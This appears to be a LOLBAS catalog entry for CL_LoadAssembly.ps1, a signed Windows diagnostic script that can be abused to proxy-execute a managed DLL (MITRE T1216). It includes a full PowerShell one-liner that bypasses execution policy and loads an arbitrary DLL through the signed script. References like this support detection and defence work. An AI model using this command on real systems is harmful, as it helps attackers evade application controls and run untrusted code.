Catalog LOLBAS

LOL · Script

CL_LoadAssembly.ps1

1 technique WindowsLOLBAS GPL-3.0

Execute

Execution Windows

Proxy execute Managed DLL with PowerShell

Use Execute proxied payload with Microsoft signed binary

powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"
Context
user
Native
Execute
MITRE
T1216